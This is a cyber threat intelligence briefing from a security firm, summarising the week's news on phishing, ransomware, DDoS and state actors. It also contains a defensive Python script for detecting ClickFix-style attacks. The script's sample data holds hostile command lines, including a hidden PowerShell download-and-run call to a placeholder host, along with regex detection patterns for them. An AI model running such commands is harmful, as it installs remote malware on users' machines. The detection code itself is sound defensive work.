The Future of the SEC’s Cyber Security Disclosure Rules | DLA Piper - JDSupra
Careers, Working in Cyber and Information Security
Employers are demanding too much from junior cyber recruits • The Register
AI is changing cyber security roles, and entry-level jobs are at risk - Help Net Security
ISC2 Report: Entry-Level Hiring Needs a Reset
The Triple Threat of Burnout: Overworked, Unsatisfied, Trapped
Building a Career as a Cyber Warfare Defender - DataBreachToday
Cyber Security Company Launches In-House 'University' Training Program
Law Enforcement Action and Take Downs
Cyber crime crackdown disrupts malware, infostealers, marketplaces across the globe | CyberScoop
Dutch police identify 126 Cracked.io users | Cybernews
GCHQ intern who took secret data home jailed - BBC News
Ransomware gang busted in Thailand hotel raid
Ryuk ransomware’s initial access expert extradited to the US
Law enforcement operation shut down dark web drug marketplace Archetyp Market
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
Cyber Warfare and Cyber Espionage
As Geopolitical Tensions Rise AI Is Amplifying the Threat of Global Cyber Warfare
Israeli Strikes Raise Fears of Cyber Attacks and Retaliation
Israel strikes Iran: A history of assassinations, sabotages, cyber attacks
Cyber weapons in the Israel-Iran conflict may hit the US • The Register
Cyber attacks against Israel increase since start of Iran conflict | The Jerusalem Post
Threats to the 2025 NATO Summit: Cyber, Influence, and Hybrid Risks
Protecting Civilians in Cyber Space: A UN Security Council Imperative • Stimson Center
Nation State Actors
Former CISA and NCSC Heads Warn Against Glamorizing Threat Actor Names - Infosecurity Magazine
China
China’s Spy Agencies Are Investing Heavily in AI, Researchers Say - The New York Times
How China Is Using Hackathons, Competitions to Build an Army of Hackers - Bloomberg
Former CISA and NCSC Heads Warn Against Glamorizing Threat Actor Names - Infosecurity Magazine
China Is Hacking Russia to Steal War Secrets - The New York Times
Telecom giant Viasat breached by China's Salt Typhoon hackers
State-sponsored hackers compromised the email accounts of several Washington Post journalists
Russia
Russia has a plan for long-term aggression against Europe - Kallas | УНН
Russian gang’s cyber attack on blood services ‘harmed 170 patients’ - LBC
China Is Hacking Russia to Steal War Secrets - The New York Times
Russian Hackers Bypass Gmail MFA With App-Specific Password Ruse - SecurityWeek
Suspected Russian hackers used new tactic against UK researcher | Reuters
Sweden says it is under cyber attack • Graham Cluley
Iran
Israeli Strikes Raise Fears of Cyber Attacks and Retaliation
Israel strikes Iran: A history of assassinations, sabotages, cyber attacks
Cyber Attacks against Israel increase since start of Iran conflict | The Jerusalem Post
Pro-Israel hackers hit Iran's Nobitex exchange, burn $90M in crypto
Companies Warned On Iranian Cyber Attacks - WSJ
Israel-Tied Predatory Sparrow Hackers Are Waging Cyber War on Iran’s Financial System | WIRED
Iran-Israel War Triggers a Maelstrom in Cyber Space
Iran’s internet goes offline amid claims of ‘enemy abuse’ • The Register
Iran's Cyber Army: Missing in Action
Pro-Israel hackers take credit for cyber attack on Iran's Bank Sepah
Cyber attack hits state-owned bank in Iran - Iraqi News
Iran experienced a near-total national internet blackout
Elon Musk turns on Starlink in Iran as Tehran shuts down internet | The Jerusalem Post
North Korea
North Korean hackers deepfake execs in Zoom call to spread Mac malware
North Korean Hackers Deploy Python-Based Trojan Targeting Crypto - Infosecurity Magazine
Protecting Civilians in Cyber Space: A UN Security Council Imperative • Stimson Center
US Seizes $7.74M in Crypto Tied to North Korea's Global Fake IT Worker Network
North Korean APT Hackers Attacking Ukrainian Government Agencies to Steal Login Credentials
Tools and Controls
Security Is Only as Strong as the Weakest Third-Party Link
Who's guarding the AI? Even security teams are bypassing oversight - Help Net Security
Ransomware Gangs Exploit Unpatched SimpleHelp Flaws to Target Victims with Double Extortion
Choosing a Clear Direction in the Face of Growing Cyber Security Demands - SecurityWeek
Former CISA and NCSC Heads Warn Against Glamorizing Threat Actor Names - Infosecurity Magazine
How cyber insurers are adapting to the new ransomware playbook | Insurance Business America
CISOs flag gaps in GenAI strategy, skills, and infrastructure - Help Net Security
Fog ransomware attacks use employee monitoring tool to break into business networks | TechRadar
AI is changing cyber security roles, and entry-level jobs are at risk - Help Net Security
Cyber Security Strategy Shifts Amid Global Political Tensions
What is a compliance audit? (with an example checklist) | TechTarget
CISOs brace for a surge in domain-based cyber threats - Help Net Security
SAML vs. OAuth 2.0: Mastering the Key Differences - Security Boulevard
Microsoft Quietly Disabled Windows Hello Facial Recognition in the Dark
Why a Layered Approach Is Essential for Cyber Security and Zero Trust - Security Boulevard
Mitigating AI Threats: Bridging the Gap Between AI and Legacy Security - SecurityWeek
Application security risk: How leaders can protect their businesses | IT Pro
Stop Anthropomorphizing AI and Secure It Like Software
The new attack surface: from space to smartphone - SpaceNews
Other News
‘We’re being attacked all the time’: how UK banks stop hackers | Banking | The Guardian
Why Legal Firms Are Vulnerable to Cyber Threats and How to Prevent the Risks | LawNews.co.uk
Threats to the 2025 NATO Summit: Cyber, Influence, and Hybrid Risks
Over Two Thirds of MSPs Hit by Multiple Breaches in Past Year, Survey Reveals - IT Security Guru
MSPs remain confident over security | Microscope
Bank of England loses hundreds of laptops amid rising cyber threat
WestJet: 'expect interruptions' online amid security snafu • The Register
This Is One of the Worst Things You Can Do at the Airport, According to Cyber Security Experts
Why Are Cyber Criminals Targeting Law Firms With Voice Phishing? | Law.com
Cyber Attacks on Humanitarian Orgs Jump Worldwide
Survey of UK retailers shows lack of preparedness for cyber attacks | Logistics Matters
Vulnerability Management
Vulnerabilities
Veeam Patches CVE-2025-23121: Critical RCE Bug Rated 9.9 CVSS in Backup & Replication
Code Execution Vulnerabilities Patched in Veeam, BeyondTrust Products - SecurityWeek
Critical Vulnerability Patched in Citrix NetScaler - SecurityWeek
High-Severity Vulnerabilities Patched by Cisco, Atlassian - SecurityWeek
New Linux Flaws Enable Full Root Access via PAM and Udisks Across Major Distributions
Google Chrome Zero-Day CVE-2025-2783 Exploited by TaxOff to Deploy Trinper Backdoor
Critical Vulnerability Exposes Many Mitel MiCollab Instances to Remote Hacking - SecurityWeek
Apple squashes zero-click bug used for spyware attacks • The Register
Palo Alto Networks fixed multiple privilege escalation flaws
Code Execution Vulnerabilities Patched in Veeam, BeyondTrust Products - SecurityWeek
BeyondTrust warns of pre-auth RCE in Remote Support software
Microsoft Quietly Disabled Windows Hello Facial Recognition in the Dark
AMD releases security update for Ryzen CPUs with TPM vulnerability - Techzine Global
Over 46,000 Grafana instances exposed to account takeover bug
Microsoft: June Windows Server security updates cause DHCP issues
ASUS Armoury Crate bug lets attackers get Windows admin privileges
Attackers actively exploit older TP-Link routers | Cybernews
Organisations Warned of Vulnerability Exploited Against Discontinued TP-Link Routers - SecurityWeek
Zyxel Firewall Vulnerability Again in Attacker Crosshairs - SecurityWeek
Hackers Exploit Langflow Flaw to Unleash Flodrix Botnet
SinoTrack GPS vulnerabilities may allow attackers to track, control vehicles - Help Net Security
Researchers Warn of AI Attacks After PoC Exploits Atlassian's AI Agent - Infosecurity Magazine
Sector Specific
Industry specific threat intelligence reports are available.
Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.
· Automotive
· Construction
· Critical National Infrastructure (CNI)
· Defence & Space
· Education & Academia
· Energy & Utilities
· Estate Agencies
· Financial Services
· FinTech
· Food & Agriculture
· Gaming & Gambling
· Government & Public Sector (including Law Enforcement)
· Health/Medical/Pharma
· Hotels & Hospitality
· Insurance
· Legal
· Manufacturing
· Maritime & Shipping
· Oil, Gas & Mining
· OT, ICS, IIoT, SCADA & Cyber-Physical Systems
· Retail & eCommerce
· Small and Medium Sized Businesses (SMBs)
· Startups
· Telecoms
· Third Sector & Charities
· Transport & Aviation
· Web3
Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.
Look out for our ‘Cyber Tip Tuesday’ video blog, also available on our YouTube channel.
You can also follow us on Facebook, Twitter and LinkedIn.
Links to articles are for interest and awareness; linking to or reposting external content does not endorse any service or product, and we are not responsible for the security of external links.
Black Arrow Cyber Threat Intelligence Briefing 13 June 2025
Black Arrow Cyber Threat Intelligence Briefing 13 June 2025:
-Scattered Spider Uses Tech Vendor Impersonation and Phishing Kits to Target Helpdesks
-An Emerging Phishing Technique Exploits Trust in Browser-based Messages
-Cyber Attacks on Smartphones Hit New High – Here’s How to Stay Safe
-Distributed Denial of Service Attacks on Financial Sector Surge in Scale and Sophistication
-Cyber Resilience Begins Before the Crisis
-How Did Britain’s Food Supplies Become So Vulnerable?
-Europol Says Criminal Demand for Data is “Skyrocketing”
-AI Is a Data-Breach Time Bomb, Reveals New Report
-What Is Penetration Testing? Types, Processes, Tools, and Why It’s All Worth It
-Internet Infamy Drives the Com’s Crime Sprees
-China-Linked Threat Actor Targeted +70 Orgs Worldwide, SentinelOne Warns
-Here’s Why Ignoring Politics Is No Longer an Option for Cyber Defence
-UK to Join Up with Allies for Stronger Response to Putin’s ‘Grey Zone’ Warfare
Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.
Executive Summary
This week’s review starts with evolving cyber attack techniques including the targeting of IT and managed service providers to gain access to multiple firms through a single compromise, while other techniques include exploiting end-user trust in messages appearing in browsers, attacks on smartphones, and increasingly complex DDoS attacks. We also reflect on the need for all organisations to proactively plan for a cyber incident, and the need to improve cyber-resilience of food supplies.
Our analysis of specialist and other media highlights the threats that organisations face in protecting their data, with high criminal demand and sensitive data being exposed to insecure and unverified AI tools. We also include information on penetration testing, which is one of the key ways for organisations to identify and address vulnerabilities that can be exploited by attackers.
Finally, we include articles on developments within the attacker community, including groups of teenagers and young adults as well as nation states, and insights into the impact of geo-political developments on cyber security for organisations.
At Black Arrow, we believe organisations achieve the most appropriate security by taking a proactive, cross-functional approach to cyber resilience. This starts with board engagement and threat-informed decision-making, including managing risks that are currently being exploited through third parties such as IT and managed service providers.
Top Cyber Stories of the Last Week
Scattered Spider Uses Tech Vendor Impersonation and Phishing Kits to Target Helpdesks
ReliaQuest has reported that the group behind recent cyber attacks on UK retailers, including Marks & Spencer and Harrods, is now using advanced impersonation tactics to breach organisations via their IT providers. Over 80% of associated domains mimic trusted technology vendors, enabling attacks on high-value targets such as CISOs and CFOs. The group combines phishing kits with social engineering to bypass multi-factor authentication and exploit help desks. Its use of ransomware-as-a-service partnerships allows access to powerful attack tools, expanding its reach. Attacks increasingly target managed service providers to access multiple organisations through a single compromise.
https://www.infosecurity-magazine.com/news/scattered-spider-tech-vendor/
An Emerging Phishing Technique Exploits Trust in Browser-based Messages
ClickFix is an emerging phishing technique exploiting user trust in browser-based messages to deliver malware, with attacks now observed across EMEA and the US. These campaigns trick users into executing PowerShell commands by mimicking familiar prompts, such as fake CAPTCHA checks, browser errors or job interview glitches. Unlike traditional phishing emails, these attacks unfold entirely within the browser, making detection and prevention more difficult. Threat actors are leveraging ClickFix to install a range of malware, from credential stealers to remote access tools, and the method’s adaptability is increasing its appeal. Organisations are advised to adopt phishing-resistant authentication and identity-focused defences.
https://www.darkreading.com/remote-workforce/cutting-edge-clickfix-snowball-phishing
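Because the technique above unfolds in the browser and ends with the user pasting a command into a local prompt, the detectable residue is a process start: a scripting host launched from the Run dialog (a child of explorer.exe) or from the browser, with a command line that hides its window, carries an encoded payload, or fetches and executes remote content. The Python below is an added example written for this briefing, not code from the article or from any vendor product; the event records, field names (ts, host, parent, image, cmdline) and the indicator list are constructed, loosely modelled on process-creation telemetry such as Sysmon Event ID 1, and the hosts use the reserved .invalid domain. It shows a defender's triage rule that separates the pattern from routine scripted PowerShell.

```python
"""Flag process-creation events consistent with the ClickFix pattern
(user-pasted command, launched from the Run dialog or a browser).

Added example, not from the briefing. Events below are constructed.
"""
import re

# Constructed sample telemetry: one record per process start.
SAMPLE_EVENTS = [
    {"ts": "2025-06-10T09:12:03Z", "host": "WS-0142", "parent": "explorer.exe",
     "image": "powershell.exe",
     "cmdline": 'powershell.exe -w hidden -c "iex (irm https://captcha-check.example.invalid/v)"'},
    {"ts": "2025-06-10T09:15:40Z", "host": "WS-0142", "parent": "cmd.exe",
     "image": "powershell.exe",
     "cmdline": "powershell.exe -NoProfile -File C:\\Scripts\\inventory.ps1"},
    {"ts": "2025-06-10T09:20:11Z", "host": "WS-0207", "parent": "explorer.exe",
     "image": "mshta.exe",
     "cmdline": "mshta.exe https://verify.example.invalid/ok"},
    {"ts": "2025-06-10T09:22:55Z", "host": "WS-0310", "parent": "msedge.exe",
     "image": "powershell.exe",
     "cmdline": "powershell.exe -enc SQBFAFgA"},
]

# Parents that indicate a user typed or pasted the command (Run dialog is a
# child of explorer.exe; some lures launch straight from the browser).
LAUNCHERS = {"explorer.exe", "msedge.exe", "chrome.exe", "firefox.exe"}

# Interpreters the lure asks the user to invoke.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}

# Command-line traits that distinguish a pasted lure from an admin script.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "encoded_command": re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{8,}", re.I),
    "download_and_run": re.compile(
        r"\b(?:iex|invoke-expression)\b.*\b(?:irm|iwr|invoke-restmethod|"
        r"invoke-webrequest|downloadstring)\b", re.I),
    "remote_url": re.compile(r"https?://", re.I),
}


def detect_clickfix(events):
    """Return one alert per event whose ancestry and command line match."""
    alerts = []
    for ev in events:
        if ev["parent"].lower() not in LAUNCHERS:
            continue  # scheduled tasks, cmd-driven scripts etc. are out of scope
        if ev["image"].lower() not in INTERPRETERS:
            continue
        hits = [name for name, rx in INDICATORS.items() if rx.search(ev["cmdline"])]
        if hits:
            alerts.append({"ts": ev["ts"], "host": ev["host"],
                           "image": ev["image"], "indicators": hits})
    return alerts


if __name__ == "__main__":
    for alert in detect_clickfix(SAMPLE_EVENTS):
        print(alert)
```

The second record, a PowerShell script run from cmd.exe with a file path and no network or encoding traits, is deliberately left unflagged: the value of the rule is the combination of an interactive launcher as parent with one of the command-line traits, not any one of them alone. In a real deployment the parent list would be tuned to the browsers in use and the alerts fed to the same helpdesk and identity controls the article recommends.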
Cyber Attacks on Smartphones Hit New High – Here’s How to Stay Safe
Kaspersky has reported a sharp rise in mobile cyber threats, with malware targeting Android users increasing by 27% in early 2025 compared to the previous quarter. Over 12 million users were affected, with banking trojans and data-stealing malware identified as the primary threats. Some infections were traced to preinstalled malware on new phones, highlighting supply chain risks. Notably active malware families included those capable of stealing credentials, intercepting messages and tampering with cryptocurrency transactions. The report warns that mobile devices are not inherently safer than desktops, and users should treat app downloads and device permissions with far greater caution.
Distributed Denial of Service Attacks on Financial Sector Surge in Scale and Sophistication
FS-ISAC and Akamai have reported a sharp rise in both the volume and complexity of Distributed Denial of Service (DDoS) attacks targeting the financial sector. In October 2024 alone, nearly 350 separate DDoS events were recorded, with some comprising billions of malicious requests. The report highlights a 23% increase in application-layer attacks over the past year, affecting login portals and APIs. What was once seen as a nuisance is now considered a strategic threat, with attackers using adaptive, multi-vector techniques to bypass defences. This surge is fuelled by escalating geopolitical tensions, with hacktivist groups exploiting global events to launch targeted disruption campaigns.
https://www.infosecurity-magazine.com/news/ddos-financial-sector-surge/
Cyber Resilience Begins Before the Crisis
Microsoft’s Deputy CISO highlights the critical need for proactive planning and clear communication in cyber incident response. Many firms treat cyber attacks as isolated IT issues, yet the impact extends across legal, HR, communications and executive leadership. Two common misconceptions, assuming incidents are minor and viewing them as purely technical, undermine resilience. Effective preparation includes tested playbooks, decision frameworks, backup communications, and rehearsed messaging strategies. AI is emerging as a valuable support tool, enhancing detection and response coordination. Ultimately, cyber resilience is a leadership issue requiring cross-functional accountability, continuous refinement, and executive engagement.
https://www.microsoft.com/en-us/security/blog/2025/06/12/cyber-resilience-begins-before-the-crisis/
How Did Britain’s Food Supplies Become So Vulnerable?
A ransomware attack on chilled food distributor Peter Green Chilled left over £100,000 worth of meat products stranded, highlighting vulnerabilities in the UK's cold chain logistics. With around 50 per cent of all UK food moving through this network, any disruption can rapidly impact supermarket shelves. Industry experts warn that cyber attacks on supply chain providers are growing in sophistication, with attackers targeting warehouse systems and vehicle tracking to halt distribution. Despite the sector’s critical role in food and pharmaceutical delivery, it currently lacks formal Critical National Infrastructure recognition, limiting coordinated incident response planning at a national level.
https://www.telegraph.co.uk/news/2025/06/05/how-did-britains-food-supplies-become-so-vulnerable/
Europol Says Criminal Demand for Data is “Skyrocketing”
Europol’s latest assessment highlights a booming criminal underground economy fuelled by an insatiable demand for data. With personal and business information now a central commodity, cyber criminals are exploiting gaps in digital literacy and complex IT environments to steal, trade and weaponise data at scale. Stolen credentials are repeatedly used to fuel further breaches, while specialised marketplaces and encrypted channels facilitate widespread illicit trade. Europol warns this cycle is eroding public trust and undermining economic stability.
https://www.infosecurity-magazine.com/news/europol-criminal-demand-data/
AI Is a Data-Breach Time Bomb, Reveals New Report
Varonis has found that nearly every organisation is vulnerable to data exposure as a result of adopting AI without adequate controls. Analysis of 1,000 data risk assessments revealed 99% had sensitive data exposed to AI tools, and 90% had critical cloud data openly accessible. Shadow AI and unverified apps were present in 98% of cases, while 1 in 7 lacked multi-factor authentication. The report highlights how poor identity governance, excessive data access, and sprawling cloud environments are creating significant breach risks. It urges organisations to tighten access, monitor data use, and employ automation to safeguard information in the AI era.
https://www.bleepingcomputer.com/news/security/ai-is-a-data-breach-time-bomb-reveals-new-report/
What Is Penetration Testing? Types, Processes, Tools, and Why It’s All Worth It
Penetration testing is a controlled and authorised simulation of a cyber attack, designed to identify vulnerabilities that could be exploited by real-world threat actors. Ethical hackers emulate criminal tactics to test systems, infrastructure, and even staff behaviour. While automated scans help detect known flaws, penetration testing offers deeper insight by revealing how small issues can be combined into significant risks. It plays a critical role in strengthening cyber resilience, supporting regulatory compliance such as ISO 27001, and demonstrating due diligence. Organisations typically conduct pen tests one or more times a year, often alongside continuous automated scanning.
Black Arrow delivers tailored penetration testing services together with a range of selected partners to help uncover real-world risks through expert-led assessments.
https://blog.jetbrains.com/teamcity/2025/06/what-is-penetration-testing/
Internet Infamy Drives the Com’s Crime Sprees
A growing cyber criminal movement known as “The Com” is drawing in teenagers and young adults who are motivated more by notoriety than money. Their activities range from phishing and SIM swapping to swatting, sextortion and, in some cases, physical violence. Researchers estimate only a small core group is responsible for the most serious crimes, but the wider subculture is expanding rapidly. Law enforcement is now treating parts of the movement as a terrorism threat, with arrests increasing. Analysts warn that underlying socio-economic pressures are driving recruitment, particularly among minors who are seen as lower-risk by criminal gangs.
https://cyberscoop.com/the-com-subculture-infamy-crimes/
China-Linked Threat Actor Targeted +70 Orgs Worldwide, SentinelOne Warns
SentinelOne has uncovered a sustained cyber espionage campaign linked to China, affecting over 70 organisations globally between July 2024 and March 2025. Targets included government bodies, media outlets, and firms in sectors such as finance, manufacturing, and telecoms. The threat actor, dubbed PurpleHaze, used sophisticated techniques including obfuscated malware and dynamic relay networks to maintain stealth and persistence. Victims ranged from a South Asian government entity to a European media firm and even SentinelOne itself. The research highlights an ongoing trend of state-aligned groups targeting cyber security providers, underscoring the need for continuous monitoring and collective defence through intelligence sharing.
Here’s Why Ignoring Politics Is No Longer an Option for Cyber Defence
Flashpoint’s latest report underscores the growing overlap between global politics and cyber threats, with geopolitical tensions now seen as a key driver of cyber activity. Russian organisations, once largely avoided by cyber criminals, are increasingly targeted due to shifting allegiances following the Ukraine conflict. The SANS Institute found that nearly 500 professionals now view cyber security as a core business risk shaped by international events. Threat actors from countries such as North Korea, Iran, and China are deploying tactics including AI-generated deepfakes and disinformation to destabilise democratic processes and evade sanctions, highlighting the need for a broader geopolitical lens in threat assessments.
https://cybernews.com/security/ignoring-politics-is-no-longer-an-option-for-cyber-pros/
UK to Join Up with Allies for Stronger Response to Putin’s ‘Grey Zone’ Warfare
The UK is strengthening cooperation with allies to deter and respond to so-called grey zone threats, including cyber attacks, sabotage of undersea infrastructure and disinformation operations. These sub-threshold activities, increasingly used by Russia, are designed to destabilise without triggering full-scale military conflict. The Government’s latest Strategic Defence Review highlights the need for joint crisis decision-making and improved readiness to counter such tactics. NATO has reaffirmed that cyber or hybrid attacks may justify a collective response under Article 5. The review also stresses the growing complexity of threats, particularly where state actors blur the lines between conventional, cyber and nuclear deterrence.
https://inews.co.uk/news/politics/uk-allies-putin-grey-zone-warfare-3735380
Governance, Risk and Compliance
Rising strategic role of the CISO | Deloitte Insights
Prep for Layoffs Before They Compromise Security
Docuseries Explores Mental, Physical Hardships of CISOs
Investor behaviour in the wake of cyber's 'black swan' moment | Computer Weekly
The Silent Cyber Crisis Alarming Global Economies and Why It's Time for Collective Action | IBTimes
Cyber resilience begins before the crisis | Microsoft Security Blog
Threats
Ransomware, Extortion and Destructive Attacks
DragonForce Victimisation on the Rise | SC Media UK
Attackers exploit Fortinet flaws to deploy Qilin ransomware
Scattered Spider and DragonForce unite to cash in on M&S hacking
Scattered Spider Uses Tech Vendor Impersonation to Target Helpdesks - Infosecurity Magazine
Former Black Basta Members Use Microsoft Teams and Python Scripts in 2025 Attacks
Threat hunting case study: DragonForce | Intel 471
Fog ransomware attack uses unusual mix of legitimate and open-source tools
Agencies Release Actionable Guidance on Play Ransomware | Schwabe, Williamson & Wyatt PC - JDSupra
'PathWiper' Attack Hits Critical Infrastructure In Ukraine
LockBit panel data leak shows Chinese orgs among the most targeted - Help Net Security
South African man imprisoned after ransom demand against his former employer
Ransomware Victims
Scattered Spider and DragonForce unite to cash in on M&S hacking
M&S food sales growth collapses after cyber attack
M&S cyber attack should prompt retailers to focus on response
How did Britain’s food supplies become so vulnerable?
M&S restarts online orders after cyber attack - BBC News
Tax resolution firm Optima Tax Relief hit by ransomware, data leaked
Main distributor to Amazon’s Whole Foods hit by cyber attack
British Horseracing Authority targeted by cyber attack - BBC Sport
Phishing & Email Based Attacks
Cutting-Edge ClickFix Tactics Snowball
Study: 73% of founders can’t spot phishing emails | Cybernews
Employees repeatedly fall for vendor email compromise attacks - Help Net Security
New Atomic macOS Stealer Campaign Exploits ClickFix to Target Apple Users
What is asymmetric cyberattack? | Definition from TechTarget
AitM Phishing Attacks Targeting Microsoft 365 and Google to Steal Login Credentials
That ‘unsubscribe’ link is actually a hidden security risk — do this instead | Tom's Guide
Phishing Alert as Erie Insurance Reveals Cyber “Event” - Infosecurity Magazine
Business Email Compromise (BEC)/Email Account Compromise (EAC)
Employees repeatedly fall for vendor email compromise attacks - Help Net Security
Other Social Engineering
Cutting-Edge ClickFix Tactics Snowball
Help Desk Hoax: How Attackers Bypass Tech Defenses
Cybercriminals are turning stolen data into a thriving black market - Help Net Security
New Atomic macOS Stealer Campaign Exploits ClickFix to Target Apple Users
What is asymmetric cyberattack? | Definition from TechTarget
The 'red flag' Grindr users should watch out for to stay safe
FIN6 hackers pose as job seekers to backdoor recruiters’ devices
Fraud, Scams and Financial Crime
The 'red flag' Grindr users should watch out for to stay safe
145 criminal domains linked to BidenCash Marketplace seized - Help Net Security
Mastercard: Fraud attempts jump as retailers feel cyber attack sting
US files to seize $7.7M laundered by North Korean IT workers • The Register
Five plead guilty to laundering $36 million stolen in investment scams
44% of people encounter a mobile scam every single day, Malwarebytes finds | Malwarebytes
WordPress Sites Turned Weapon: How VexTrio and Affiliates Run a Global Scam Network
Amazon promises fake reviews crackdown after investigation by UK watchdog | Amazon | The Guardian
Artificial Intelligence
Godfather of AI Alarmed as Advanced Systems Quickly Learning to Lie, Deceive, Blackmail and Hack
Next-Gen Developers Are a Cybersecurity Powder Keg
AI threats leave SecOps teams burned out and exposed - Help Net Security
Cloud and AI drive efficiency, but open doors for attackers - Help Net Security
Cyber crime is surging. Will AI make it worse?
AI is a data-breach time bomb, reveals new report
What CISOs need to know about agentic AI - Help Net Security
Securing agentic AI systems before they go rogue - Help Net Security
UK ICO publishes AI and biometrics strategy | Computer Weekly
Enterprises stuck in AI pilot hell, says Chatterbox Labs • The Register
OpenAI Bans ChatGPT Accounts Used by Russian, Iranian and Chinese Hacker Groups
Malware
New Atomic macOS Stealer Campaign Exploits ClickFix to Target Apple Users
New Supply Chain Malware Operation Hits npm and PyPI Ecosystems, Targeting Millions Globally
CISO who helped unmask Badbox warns: Version 3 is coming • The Register
FIN6 Uses AWS-Hosted Fake Resumes on LinkedIn to Deliver More_eggs Malware
Supply chain attack hits Gluestack NPM packages with 960K weekly downloads
Two Distinct Botnets Exploit Wazuh Server Vulnerability to Launch Mirai-Based Attacks
React Native Aria Packages Backdoored in Supply Chain Attack - SecurityWeek
Malicious NPM Packages Disguised as Express Utilities Allow Attackers to Wipe Systems - SecurityWeek
DanaBot malware operators exposed via C2 bug added in 2022
Bots/Botnets
CISO who helped unmask Badbox warns: Version 3 is coming • The Register
New Mirai botnet infect TBK DVR devices via command injection flaw
Recently Disrupted DanaBot Leaked Valuable Data for 3 Years - SecurityWeek
Two Distinct Botnets Exploit Wazuh Server Vulnerability to Launch Mirai-Based Attacks
Mobile
Cyber attacks on smartphones hit new high - here's how to stay safe | TechRadar
44% of people encounter a mobile scam every single day, Malwarebytes finds | Malwarebytes
Millions of low-cost Android devices turn home networks into crime platforms - Ars Technica
Chinese phone hacks, user lapses create 'mobile security crisis' | Fortune
Blocking stolen phones from the cloud can but won't be done • The Register
Cops want Apple, Google to kill stolen phones remotely • The Register
Apple and Google clash with police and MPs over phone thefts - BBC News
Google patched bug leaking phone numbers tied to accounts
Denial of Service/DoS/DDoS
Don’t give hacktivists what they really want | CSO Online
DDoS Attacks on Financial Sector Surge in Scale and Sophistication - Infosecurity Magazine
Internet of Things – IoT
Millions of low-cost Android devices turn home networks into crime platforms - Ars Technica
CISO who helped unmask Badbox warns: Version 3 is coming • The Register
New Mirai botnet infect TBK DVR devices via command injection flaw
40,000 cameras expose feeds to datacenters, health clinics • The Register
I found terrifying smart home security holes and you probably have them too
Data Breaches/Leaks
Cyber criminals are turning stolen data into a thriving black market - Help Net Security
Europol Says Criminal Demand for Data is “Skyrocketing” - Infosecurity Magazine
Recently Disrupted DanaBot Leaked Valuable Data for 3 Years - SecurityWeek
AI is a data-breach time bomb, reveals new report
The Dark Web's Currency of Choice: Stolen Data - IT Security Guru
Legal aid lawyers face 'chaos' following cyber attack - as some left 'in tears' and... - LBC
Over 80,000 Microsoft Entra ID Accounts Targeted Using Open-Source TeamFiltration Tool
'Major compromise' at NHS temping arm never disclosed • The Register
Phishing Alert as Erie Insurance Reveals Cyber “Event” - Infosecurity Magazine
86 million AT&T customer records reportedly up for sale on the dark web | ZDNET
Insurer Exposed Drivers' Personal Information, Court Told - Law360
Organised Crime & Criminal Actors
Cyber criminals are turning stolen data into a thriving black market - Help Net Security
Europol Says Criminal Demand for Data is “Skyrocketing” - Infosecurity Magazine
Cyber crime is surging. Will AI make it worse?
OpenAI Bans ChatGPT Accounts Used by Russian, Iranian and Chinese Hacker Groups
Five plead guilty to laundering $36 million stolen in investment scams
Cyber criminals turn to “residential proxy” services to hide malicious traffic
Internet infamy drives The Com's crime sprees | CyberScoop
Cyber crime news: How this Canadian hacker was caught
How Crime-As-A-Service Turned Hacking Into A Subscription Business
Hacking the Hackers: When Bad Guys Let Their Guard Down
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
Hacker arrested after exploiting 5,000 accounts in $4.5 million cryptojacking scheme | TechSpot
US accuses Russian crypto entrepreneur of money laundering and sanctions evasion
145 criminal domains linked to BidenCash Marketplace seized - Help Net Security
Insurance
Cyber insurance demand is rising, but not 'evenly': Beazley cyber head | Insurance Business America
MSSPs, MSPs See Growing Strategic Role in Cyber Insurance | MSSP Alert
Supply Chain and Third Parties
New Supply Chain Malware Operation Hits npm and PyPI Ecosystems, Targeting Millions Globally
M&S restarts online orders after cyber attack - BBC News
Main distributor to Amazon’s Whole Foods hit by cyber attack
CISOs urged to push vendors for roadmaps on post-quantum cryptography readiness | CSO Online
Third-party security weaknesses threaten Europe’s big banks | Computer Weekly
Supply chain attack hits Gluestack NPM packages with 960K weekly downloads
Cloud/SaaS
Over 80,000 Microsoft Entra ID Accounts Targeted Using Open-Source TeamFiltration Tool
Cloud and AI drive efficiency, but open doors for attackers - Help Net Security
AitM Phishing Attacks Targeting Microsoft 365 and Google to Steal Login Credentials
Former Black Basta Members Use Microsoft Teams and Python Scripts in 2025 Attacks
Google Cloud and Cloudflare hit by widespread service outages
Outages
Massive cloud outage knocks out internet services across the globe | ZDNET
‘Severe’ network outages costing $160bn globally | Computer Weekly
Encryption
CISOs urged to push vendors for roadmaps on post-quantum cryptography readiness | CSO Online
See How Much Faster a Quantum Computer Will Crack Encryption | WIRED
Quantum Computers Pose a Grave Risk to The Future. Here's Why. : ScienceAlert
Digital rights groups sound alarm on Stop CSAM Act | CyberScoop
Linux and Open Source
Unverified code is the next national security threat | CyberScoop
Passwords, Credential Stuffing & Brute Force Attacks
295 Malicious IPs Launch Coordinated Brute-Force Attacks on Apache Tomcat Manager
Social Media
The 'red flag' Grindr users should watch out for to stay safe
FIN6 Uses AWS-Hosted Fake Resumes on LinkedIn to Deliver More_eggs Malware
Regulations, Fines and Legislation
Trump cyber executive order takes aim at prior orders, secure software, more | CyberScoop
Banks Challenge Treasury on Cybersecurity Failures - The Global Treasurer
Digital rights groups sound alarm on Stop CSAM Act | CyberScoop
UK ICO publishes AI and biometrics strategy | Computer Weekly
Trump limits use of cyber rules to punish US hackers, election meddlers - Defense One
Trump to Keep Starlink at White House Despite Cyber Security Concern
Models, Frameworks and Standards
Enterprise SIEMs miss 79% of known MITRE ATT&CK techniques - Help Net Security
SIEMs Missing the Mark on MITRE ATT&CK Techniques
NIST Launches Updated Incident Response Guide - Security Boulevard
NIST Publishes New Zero Trust Implementation Guidance - Infosecurity Magazine
Data Protection
Security & data protection: when two become one | TechRadar
Careers, Working in Cyber and Information Security
Human vs digital therapy: AI falls short when IT pros need help | Computer Weekly
